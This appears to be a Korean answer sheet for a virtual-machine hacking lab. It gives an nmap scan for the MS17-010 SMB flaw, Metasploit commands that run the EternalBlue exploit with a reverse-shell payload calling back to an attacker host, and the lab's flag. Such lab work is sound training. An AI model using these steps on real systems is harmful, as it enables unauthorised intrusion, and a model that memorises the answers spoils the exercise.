Task4 가상 머신 해킹 실습

1번 문제

영상에서 어떤 프로그램을 이용해서 타겟 머신에 공격자가 접근 가능한지 확인하나요?

---

• 정답
  ping

2번 문제

영상에서 어떤 프로그램을 이용해서 타겟 머신을 스캔하나요?

---

• 정답
  nmap

3번 문제

취약한 SMB 서비스를 스캔하기 위해서 어떤 nmap 스크립트를 사용했나요?

---

nmap -p 445 --script smb-vuln-ms17-010 -Pn -n --open -T4 10.10.18.199

• 정답
  smb-vuln-ms17-010

4번 문제

메타스플로잇 프레임워크의 exploit/windows/smb/ms17_010_eternalblue 모듈을 사용해 익스플로잇을 진행할 때, 페이로드를 어떤걸로 바꿨었나요?

---

• msfconsole 사용법

  msfconsole
  search ms17-010
  use 0
  set rhosts 10.10.18.199 [Target IP]
  set lhost 10.4.17.111 [Host IP]
  set payload windows/x64/shell/reverse_tcp
  exploit

• 정답
  windows/x64/shell/reverse_tcp

5번 문제

PWN 성공! 플래그를 입력해주세요. 플래그 형식은 flag{XYZ} 입니다. 플래그 파일을 출력한 뒤, 그냥 출력값을 모두 드래그 해서 복사/붙여넣기 하세요.

---

• 정답
  flag{access_the_machine}